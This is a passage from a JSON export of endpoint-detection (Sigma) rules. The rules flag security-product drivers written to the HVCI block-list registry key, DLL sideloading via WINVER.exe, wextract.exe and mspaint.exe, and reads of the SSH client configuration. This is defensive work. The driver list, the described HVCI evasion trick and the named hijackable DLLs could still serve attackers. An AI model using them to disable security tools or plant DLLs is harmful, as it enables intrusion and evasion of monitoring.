'wlminisecmod.sys'\n - 'WntGPDrv.sys'\n # X-Cloud Systems\n - 'xcpl.sys'\n # Xacti\n - 'stflt.sys'\n # Yahoo Japan Corporation\n - 'YahooStorage.sys'\n # Yandex LLC\n - 'bmregdrv.sys'\n - 'bmfsdrv.sys'\n # YATEM Co. Ltd.\n - 'LCmPrintMon.sys'\n - 'LCgAdMon.sys'\n - 'LCmAdMon.sys'\n - 'LCgFileMon.sys'\n - 'LCmFile.sys'\n - 'LCgFile.sys'\n - 'LCmFileMon.sys'\n # Yokogawa Corpration\n - 'YFSD2.sys'\n # Yokogawa R&L Corp\n - 'YFSDR.SYS'\n - 'YFSD.SYS'\n - 'YFSRD.sys'\n - 'psgfoctrl.sys'\n - 'psgdflt.sys'\n # Zampit\n - 'zampit_ml.sys'\n # ZenmuTech Inc.\n - 'mumdi.sys'\n # Zhuan Zhuan Jing Shen\n - 'zzpensys.sys'\n # ZoneFox\n - 'KernelAgent32.sys'\n #\n # FSFilter Activity Monitor - END\n #\n #\n # Invoke-EDRCheck.ps1 - BEGIN\n # Duplicates from previous source are removed.\n #\n # Altiris Symantec\n - 'atrsdfw.sys'\n # Avast\n - 'naswSP.sys'\n # Carbon Black\n - 'CbELAM.sys'\n - 'ctifile.sys'\n - 'ctinet.sys'\n - 'parity.sys'\n # Cisco\n - 'csacentr.sys'\n - 'csaenh.sys'\n - 'csareg.sys'\n - 'csascr.sys'\n # CJSC Returnil Software\n - 'rvsavd.sys'\n # Comodo Security\n - 'CmdMnEfs.sys'\n - 'MyDLPMF.sys'\n # CrowdStrike\n - 'im.sys'\n - 'CSDeviceControl.sys'\n - 'CSFirmwareAnalysis.sys'\n # Cybereason\n - 'CRExecPrev.sys'\n # Endgame\n - 'esensor.sys'\n # ESET\n - 'edevmon.sys'\n # F-Secure\n - 'xfsgk.sys'\n # HarfangLab ! 
:)\n - 'hlprotect.sys'\n # Malwarebytes\n - 'mbamwatchdog.sys'\n # Microsoft Defender\n - 'MpKslDrv.sys'\n # Palo Alto Networks - Cortex XDR\n - 'cyverak.sys'\n - 'cyvrlpc.sys'\n - 'cyvrmtgn.sys'\n - 'tdevflt.sys'\n # Raytheon Cyber Solutions\n - 'eaw.sys'\n # Symantec\n - 'vxfsrep.sys'\n - 'VirtFile.sys'\n - 'SymAFR.sys'\n - 'symefasi.sys'\n - 'symefa.sys'\n - 'symefa64.sys'\n - 'SymHsm.sys'\n - 'evmf.sys'\n - 'GEFCMP.sys'\n - 'VFSEnc.sys'\n - 'pgpfs.sys'\n - 'fencry.sys'\n - 'symrg.sys'\n # Verdasys Inc\n - 'ndgdmk.sys'\n # Tehtris\n - 'egfilterk.sys'\n # Sophos\n - 'SophosDt2.sys'\n - 'SophosSupport.sys'\n # Cisco AMP\n - 'ExPrevDriver.sys'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "48fe9f11-44de-4b4b-807c-00bb14c3058b",
"rule_name": "EDR/AV Driver added to HVCI Disallowed Images in Registry",
"rule_description": "Detects common AV or EDR driver names being written into the HVCIDisallowedImages registry key. The blocking only takes effect after the next machine reboot.\nHVCI (Hypervisor Enforced Code Integrity) is a Windows mechanism that contains an undocumented feature that allows registering an array of driver names to be blocked.\nAttackers can use this feature to disable security products by blocking their respective drivers.\nIt is recommended to check whether the process modifying the registry keys has legitimate reasons to do so.\n",
"rule_creation_date": "2023-06-13",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "492d7132-a7e9-44bb-9a91-39bac44a9e1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082179Z",
"creation_date": "2026-03-23T11:45:34.082181Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082185Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_winver.yml",
"content": "title: DLL Hijacking via WINVER.exe\nid: 492d7132-a7e9-44bb-9a91-39bac44a9e1d\ndescription: |\n Detects potential Windows DLL Hijacking via WINVER.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'WINVER.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "492d7132-a7e9-44bb-9a91-39bac44a9e1d",
"rule_name": "DLL Hijacking via WINVER.exe",
"rule_description": "Detects potential Windows DLL Hijacking via WINVER.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588648Z",
"creation_date": "2026-03-23T11:45:34.588652Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588659Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wextract.yml",
"content": "title: DLL Hijacking via wextract.exe\nid: 494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0\ndescription: |\n Detects potential Windows DLL Hijacking via wextract.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wextract.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\Cabinet.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "494a754b-5e46-4cc1-aa3a-fc93a3fdd2f0",
"rule_name": "DLL Hijacking via wextract.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wextract.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4956a3c7-a3ae-4f77-8867-d59afb6ba420",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591526Z",
"creation_date": "2026-03-23T11:45:34.591530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591538Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mspaint.yml",
"content": "title: DLL Hijacking via mspaint.exe\nid: 4956a3c7-a3ae-4f77-8867-d59afb6ba420\ndescription: |\n Detects potential Windows DLL Hijacking via mspaint.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'mspaint.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\MSFTEDIT.DLL'\n - '\\PROPSYS.dll'\n - '\\winmm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4956a3c7-a3ae-4f77-8867-d59afb6ba420",
"rule_name": "DLL Hijacking via mspaint.exe",
"rule_description": "Detects potential Windows DLL Hijacking via mspaint.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "496c255d-2d49-4b7d-9693-b89edbc5e17d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T10:57:06.348750Z",
"creation_date": "2026-03-23T11:45:35.296957Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296970Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1021/004/",
"https://attack.mitre.org/techniques/T1563/001/",
"https://attack.mitre.org/techniques/T1484/"
],
"name": "t1021_004_ssh_client_config_read_linux.yml",
"content": "title: SSH Client Configuration Read\nid: 496c255d-2d49-4b7d-9693-b89edbc5e17d\ndescription: |\n Detects an attempt to read the content of the SSH client configuration file.\n The SSH client configuration contains the security settings used by SSH.\n An attacker can read the SSH client configuration to find weaknesses in them.\n It is recommended to investigate the process performing the read operation and to look for other malicious action stemming from it.\nreferences:\n - https://attack.mitre.org/techniques/T1021/004/\n - https://attack.mitre.org/techniques/T1563/001/\n - https://attack.mitre.org/techniques/T1484/\ndate: 2022/11/07\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.004\n - attack.t1563.001\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1484\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection_path:\n - Path: '/etc/ssh/ssh_config'\n ProcessImage|contains: '?'\n - TargetPath: '/etc/ssh/ssh_config'\n ProcessImage|contains: '?'\n\n selection_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/sha256sum'\n - '/usr/bin/sha1sum'\n - '/usr/bin/md5sum'\n - '/usr/bin/sshpass'\n - '/usr/bin/ssh-keygen'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/bin/glab'\n - '/usr/bin/systemd-tmpfiles'\n - '/usr/bin/cpio'\n - '/usr/bin/rsync'\n - '/usr/bin/dockerd'\n - '/usr/local/bin/restic'\n - '/usr/bin/curl' # curl -k sftp://\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/file'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/libexec/cockpit-ssh'\n - '/usr/bin/syft'\n - '/usr/local/bin/argocd'\n - '/usr/local/bin/pathWalker'\n - '/usr/share/windsurf/windsurf'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/usr/bin/gh'\n - '/usr/bin/mksquashfs'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/*'\n\n exclusion_opt:\n - 
ProcessImage:\n - '/opt/eset/*'\n - '/opt/puppetlabs/puppet/bin/ruby'\n - '/opt/ds_agent/ds_am'\n - '/opt/ds_agent/ds_agent'\n - '/opt/omni/lbin/vbda'\n - '/opt/pycharm-*/jbr/bin/java'\n - '/opt/endpoint-agent/agent' # https://docs.sekoia.io/integration/categories/endpoint/sekoiaio/\n - '/opt/microfocus/Discovery/.discagnt/udscan'\n - '/opt/hpud/*/.discagnt/udscan'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/opt/apsera/orchestrator-*/vendor/ruby/bin/ruby'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/opt/CrowdStrike/falcon-sensor-*'\n - '/opt/CARKpsmp/components/ssh' # cyberark\n - '/opt/netbackup/openv/netbackup/bin/bpbkar'\n - '/opt/bacula*/sbin/bacula-fd'\n - ProcessGrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_ssh:\n - ProcessImage:\n - '/usr/bin/ssh'\n - '/snap/*/bin/ssh'\n - '/gnu/store/*/bin/ssh'\n - ProcessParentImage: '/usr/bin/ssh'\n\n exclusion_scp:\n - ProcessImage: '/usr/bin/scp'\n - ProcessParentImage: '/usr/bin/scp'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessCommandLine:\n - '/usr/bin/python3 /usr/bin/unattended-upgrade'\n - '/usr/bin/python3 /usr/bin/unattended-upgrades -d'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n - 
ProcessGrandparentCommandLine: '/bin/sh /usr/lib/apt/apt.systemd.daily install'\n\n exclusion_rpm:\n ProcessImage: '/usr/bin/rpm'\n\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python* /bin/dnf'\n - '/usr/bin/python* /usr/bin/dnf'\n\n exclusion_packagekit:\n ProcessImage:\n - '/usr/libexec/packagekitd'\n - '/usr/lib/packagekit/packagekitd'\n\n # 'sed -ne s/^[[:blank:]]\\*[Hh][Oo][Ss][Tt][[:blank:]]\\{1,\\}\\([^#\\*?%]\\*\\)\\(#.\\*\\)\\{0,1\\}$/\\1/p /etc/ssh/ssh_config'\n # 'sed -ne s/^[[:blank:]]\\*[Ii][Nn][Cc][Ll][Uu][Dd][Ee][[:blank:]]\\(.\\*\\)$/\\1/p /etc/ssh/ssh_config'\n # And many others...\n exclusion_idataagent:\n ProcessImage:\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/opt/commvault2/iDataAgent64/clBackup'\n - '/usr/bin/mawk'\n - '/usr/bin/gawk'\n ProcessParentImage:\n - '/bin/bash'\n - '/usr/bin/bash'\n ProcessCommandLine|startswith:\n - 'sed -ne s/^[ \\t]\\*[*] /etc/ssh/ssh_config'\n - 'sed -ne s/^[[:blank:]]\\*[*] /etc/ssh/ssh_config'\n - 'sed -ne 
s/^[[:blank:]]\\*[*]\\(.\\*\\)$/\\1/p /etc/ssh/ssh_config'\n - 'sed -ne s/^[[:blank:]]\\*[*]\\{1,\\}\\([^#%]\\*\\)\\(#.\\*\\)\\{0,1\\}$/\\1/p /etc/ssh/ssh_config'\n - 'awk sub(*([Gg][Ll][Oo][Bb][Aa][Ll]|[Uu][Ss][Ee][Rr])[Kk][Nn][Oo][Ww][Nn][Hh][Oo][Ss][Tt][Ss][Ff][Ii][Ll][Ee][ \\t]+*) { print $0 } /'\n - 'sed -ne s/^[[:blank:]]*[Hh][Oo][Ss][Tt][[:blank:]*$/\\1/p /'\n\n exclusion_remina:\n ProcessImage|endswith: '/remmina'\n\n exclusion_fusioninventory:\n ProcessName: 'fusioninventory-agent'\n\n exclusion_vscode:\n - ProcessImage|endswith: '/usr/share/code/code'\n - ProcessAncestors|contains: '|/snap/code/*/usr/share/code/code|'\n\n exclusion_insights_client:\n - ProcessParentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n - ProcessGrandparentCommandLine|contains:\n - '/site-packages/insights_client/run.py'\n - '/bin/insights-client-run'\n - '/bin/redhat-access-insights'\n\n exclusion_sosreport:\n ProcessImage|endswith: '/python*'\n ProcessCommandLine|startswith:\n - '/usr/bin/python* /usr/*bin/sosreport'\n - '/usr/bin/python* /usr/sbin/sos report'\n\n exclusion_aide:\n ProcessImage|endswith: '/aide'\n\n exclusion_lpar2rrd:\n - ProcessParentCommandLine|endswith: '/lpar2rrd.pl'\n - ProcessGrandparentCommandLine|endswith: '/lpar2rrd.pl'\n\n exclusion_sidekiq_containerized:\n - ProcessImage|endswith: '/ruby'\n ProcessCommandLine|contains: 'sidekiq'\n ProcessParentImage|endswith: '/containerd-shim-runc-v2'\n - ProcessParentCommandLine: '*docker-entrypoint.sh sidekiq_node'\n\n exclusion_qualys1:\n - ProcessParentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n - ProcessGrandparentImage:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_qualys2:\n # grep -Ei ^[[:blank:]]*KbdInteractiveDevices[[:blank:]]*[[:blank:]] 
/etc/ssh/ssh_config\n # grep -Ei ^[[:blank:]]*GSSAPIDelegateCredentials[[:blank:]]*[[:blank:]] /etc/ssh/ssh_config\n # grep -Ei ^[[:blank:]]*ForwardX11Trusted[[:blank:]]*[[:blank:]] /etc/ssh/ssh_config\n # ...\n ProcessCommandLine: 'grep -Ei ^[[:blank:]]\\**[[:blank:]]\\*[[:blank:]] /etc/ssh/ssh_config'\n ProcessParentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n ProcessGrandparentImage:\n - '/usr/bin/bash'\n - '/usr/bin/dash'\n\n exclusion_qualys3:\n ProcessAncestors|contains: '|/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent|'\n\n exclusion_zabbix:\n - ProcessImage: '/usr/sbin/zabbix_server'\n - ProcessParentImage:\n - '/usr/sbin/zabbix_server'\n - '/usr/sbin/zabbix_proxy'\n\n exclusion_centreon:\n ProcessImage: '/usr/bin/perl'\n ProcessParentImage:\n - '/usr/sbin/centengine'\n - '/usr/bin/bash'\n ProcessCommandLine:\n - '*/usr/lib/centreon/plugins/*ssh*'\n - '*/usr/lib/centreon/centreon-plugins-stable/*ssh*'\n - '*/opt/centreon-plugins/src/centreon_plugins.pl*'\n - '/usr/bin/perl /usr/lib/centreon/plugins/centreon_linux_ssh.pl *'\n\n # https://stackoverflow.com/questions/6431929/groundwork-nagios-check-by-ssh-is-returning-remote-command-execution-failed#6444377\n exclusion_nagios:\n - ProcessImage|endswith: '/nagios/plugins/check_by_ssh'\n - ProcessCommandLine|startswith: '/bin/bash /usr/lib64/nagios/plugins/check_ssh_disk.sh'\n\n exclusion_wazuh:\n - ProcessImage: '/var/ossec/bin/wazuh-syscheckd'\n - ProcessCommandLine: '/var/ossec/bin/wazuh-syscheckd'\n\n exclusion_tina:\n ProcessCommandLine:\n - '/tina/atempodedupengine/default/bin/.exe.ade_server'\n - '/tina/atempowebinterfaces/*'\n - '/tina/timenavigator/tina/*'\n - '/usr/atempo/timenavigator/tina/3rdparty/*'\n - '/usr/atempo/timenavigator/tina/bin/*'\n - '/usr/tina/bin/*'\n - '/usr/tina/timenavigator/tina/bin/*'\n - '/var/hote/timenavigator/tina/3rdparty/*'\n - '/var/hote/timenavigator/tina/bin/*'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n 
exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_git:\n ProcessImage: '/usr/bin/git'\n\n exclusion_oxidized:\n ProcessImage: '/usr/bin/ruby?.?'\n ProcessCommandLine:\n - '/usr/bin/ruby?.? /usr/bin/oxidized -c /etc/oxidized/config'\n - '/usr/bin/ruby?.? /usr/local/bin/oxidized'\n - '/usr/bin/ruby?.? /usr/local/bin/oxidized -c /etc/oxidized/config'\n\n exclusion_puma:\n # puma 3.11.4 (tcp://127.0.0.1:8888) [/]\n ProcessCommandLine: 'puma * (tcp://*) [/]'\n\n exclusion_rkhunter:\n - ProcessParentCommandLine|contains: '/usr/bin/rkhunter '\n - ProcessGrandparentCommandLine|contains: '/usr/bin/rkhunter '\n\n exclusion_openvas:\n ProcessImage:\n - '/usr/sbin/openvas'\n - '/usr/local/sbin/openvas'\n\n exclusion_fish:\n ProcessImage: '/usr/bin/fish'\n ProcessCommandLine: 'fish'\n\n exclusion_fish_autocomplete_1:\n ProcessImage: '/usr/bin/fish'\n ProcessParentImage:\n - 